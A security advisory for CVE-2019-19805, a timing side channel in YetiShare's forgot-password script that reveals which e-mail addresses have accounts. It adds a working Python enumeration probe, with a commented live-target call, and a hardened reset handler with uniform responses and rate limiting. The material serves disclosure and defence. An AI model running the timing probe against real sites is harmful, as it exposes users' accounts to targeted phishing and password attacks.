PT-2019-15966 · Mfscripts · Mfscripts Yetishare
Published 2019-12-30 · Updated 2021-07-21
CVE-2019-19805 · CVSS v3.1 5.3 (Medium)
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
Name of the Vulnerable Software and Affected Versions
MFScripts YetiShare versions 3.5.2 through 4.5.3
Description
The vulnerability allows an unauthenticated attacker to enumerate valid accounts by submitting guessed e-mail addresses to the account/forgot_password.ajax.php script and measuring how long each request takes. The response time differs depending on whether the submitted value corresponds to a registered account with an e-mail address on file, so the attacker can distinguish registered from unregistered addresses from the delay alone, without relying on the content of the response.
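An added example, not code from the advisory or from YetiShare, showing how the timing difference described above is turned into an enumeration oracle: a probe that times repeated forgot-password requests and a classifier that separates registered from unregistered addresses by median latency. The endpoint URL, the form-field name and the threshold ratio are assumptions, and the latency samples are constructed so the analysis runs offline.

```python
"""Timing-based account enumeration against a password-reset endpoint.

Added example, not YetiShare code. It models the CVE-2019-19805 scenario: a
forgot-password handler that takes measurably longer when the submitted
address belongs to a registered account. The HTTP probe below assumes a
hypothetical endpoint URL and form-field name; the statistics run on
constructed latency samples so the analysis can be reproduced offline.
"""
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Dict, List


def time_request(url: str, email: str, field: str = "email", timeout: float = 10.0) -> float:
    """POST one forgot-password request and return its wall-clock latency in ms.

    `field` is an assumed form-field name; read it from the real form first.
    A non-2xx reply is still timed, since the signal is the delay, not the body.
    """
    data = urllib.parse.urlencode({field: email}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError as exc:
        exc.read()
    return (time.perf_counter() - start) * 1000.0


def collect(url: str, emails: List[str], rounds: int = 10) -> Dict[str, List[float]]:
    """Interleave the candidates across rounds so that drift in server load
    (cache warm-up, other users) affects every candidate roughly equally."""
    samples: Dict[str, List[float]] = {e: [] for e in emails}
    for _ in range(rounds):
        for e in emails:
            samples[e].append(time_request(url, e))
    return samples


def classify(samples: Dict[str, List[float]], ratio: float = 1.5) -> Dict[str, str]:
    """Label each candidate "exists" or "unknown" from its median latency.

    The baseline is the lowest per-candidate median, which assumes the probe set
    includes at least one address that is certainly NOT registered (random
    throwaway addresses used as controls). Medians rather than means keep a
    single slow request (network jitter, a GC pause) from producing a false
    positive. `ratio` is a tuning assumption: the real gap depends on how long
    the extra work on the slow path takes.
    """
    medians = {e: statistics.median(v) for e, v in samples.items()}
    baseline = min(medians.values())
    return {e: ("exists" if m > baseline * ratio else "unknown") for e, m in medians.items()}


# Constructed samples (ms) standing in for collect(): two control addresses that
# are not registered and one registered address whose requests take the slower
# code path. One control has a single jitter spike to show why medians are used.
CONSTRUCTED_SAMPLES: Dict[str, List[float]] = {
    "control-9f3a@example.invalid": [41.2, 39.8, 44.0, 40.5, 38.9, 42.1],
    "control-77c1@example.invalid": [43.0, 40.1, 39.5, 120.0, 41.7, 40.9],
    "alice@example.com": [312.4, 298.7, 351.0, 305.2, 299.9, 310.8],
}


def demo() -> Dict[str, str]:
    """Classify the constructed samples; alice is the only address flagged."""
    return classify(CONSTRUCTED_SAMPLES)


if __name__ == "__main__":
    # Against a live target you would instead run:
    # classify(collect("https://target.example/account/forgot_password.ajax.php", candidates))
    for email, verdict in demo().items():
        median = statistics.median(CONSTRUCTED_SAMPLES[email])
        print(f"{email:32s} {median:7.1f} ms  {verdict}")
```

The controls matter: without at least one address known to be unregistered, the lowest median might itself belong to a valid account and every candidate would be labelled "unknown". Interleaving candidates across rounds, rather than sending all requests for one address back to back, is what keeps a temporary load spike from being mistaken for the slow path.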
Recommendations
For versions 3.5.2 through 4.5.3, make the behaviour of account/forgot_password.ajax.php independent of whether the submitted address is registered: return the same status and message in both cases, and remove the work that differs between the two paths (for example, by queuing the reset e-mail for asynchronous delivery instead of sending it inline, so that a registered address does not cost measurably more time than an unknown one). Additionally, rate-limit requests to this file per client, or restrict access to it, to reduce the number of timing measurements an attacker can collect. Rate limiting on its own does not remove the oracle; it only slows enumeration down.
Fix
Side Channel Attack
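The recommendations above as an added example, not code from the advisory or from YetiShare: a forgot-password handler that returns one status and message on both paths, queues mail for a background worker instead of sending it inline, and applies a per-client sliding-window rate limit. The account table, mail queue, clock and limits are in-memory stand-ins and assumed values.

```python
"""Forgot-password handler hardened against timing-based account enumeration.

Added example, not YetiShare code. It shows the mitigations the advisory
recommends in one place: the handler returns the same status and message
whether or not the address is registered, does the same amount of work on
both paths by queuing mail for a background worker instead of sending it
inline, and rate-limits requests per client. Account storage, the mail queue
and the clock are in-memory stand-ins so the example runs offline.
"""
import secrets
import time
from collections import deque
from typing import Deque, Dict, List, Optional, Tuple

RESET_MESSAGE = "If an account exists for that address, a password reset link has been sent."


class ResetService:
    def __init__(self, accounts: Dict[str, int], limit: int = 5, window_s: int = 3600) -> None:
        self.accounts = accounts                         # e-mail -> account id (stand-in for the user table)
        self.outbox: List[Dict[str, str]] = []           # mail jobs; a worker process sends them later
        self.tokens: Dict[str, Tuple[int, float]] = {}   # token -> (account id, issued at)
        self.limit = limit
        self.window_s = window_s
        self.hits: Dict[str, Deque[float]] = {}          # client -> timestamps of recent requests

    def _rate_limited(self, client: str, now: float) -> bool:
        """Sliding-window limit: at most `limit` requests per client per `window_s`."""
        q = self.hits.setdefault(client, deque())
        while q and now - q[0] >= self.window_s:
            q.popleft()
        if len(q) >= self.limit:
            return True
        q.append(now)
        return False

    def forgot_password(self, email: str, client: str, now: Optional[float] = None) -> Tuple[int, str]:
        now = time.time() if now is None else now
        if self._rate_limited(client, now):
            # Throttling is visible to the client, but it is decided before the
            # address is looked up, so it reveals nothing about the account.
            return 429, RESET_MESSAGE
        normalized = email.strip().lower()
        account_id = self.accounts.get(normalized)
        # Generate the token on every request so an unknown address costs the same
        # as a known one; the remaining difference (a dict insert and a list append)
        # is far below network jitter, unlike an inline SMTP delivery would be.
        token = secrets.token_urlsafe(32)
        if account_id is not None:
            self.tokens[token] = (account_id, now)
            self.outbox.append({"to": normalized, "token": token})
        # Identical status and body on both paths: the response carries no oracle.
        return 200, RESET_MESSAGE


def demo() -> Dict[str, object]:
    """Drive the service with a fixed clock: one known and one unknown address,
    then enough requests from the same client to trip the limit and wait it out."""
    svc = ResetService({"alice@example.com": 1})
    known = svc.forgot_password("Alice@example.com", "198.51.100.7", now=1000.0)
    unknown = svc.forgot_password("nobody@example.com", "198.51.100.7", now=1001.0)
    for i in range(3):                                   # requests 3..5 exhaust the limit of five
        svc.forgot_password(f"guess{i}@example.com", "198.51.100.7", now=1002.0 + i)
    throttled = svc.forgot_password("guess9@example.com", "198.51.100.7", now=1006.0)
    later = svc.forgot_password("guess9@example.com", "198.51.100.7", now=1000.0 + 3600.0 + 5.0)
    return {"known": known, "unknown": unknown, "throttled": throttled,
            "later": later, "queued": list(svc.outbox)}


if __name__ == "__main__":
    print(demo())
```

The only branch on account existence is the enqueue, which is cheap and constant in size; the expensive step (mail delivery) happens in a worker that the client never waits for. In a real deployment the outbox would be a persistent job queue, and the token would be stored hashed so a database read cannot be replayed as a reset link.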
Weakness Enumeration
Related Identifiers
Affected Products
Mfscripts Yetishare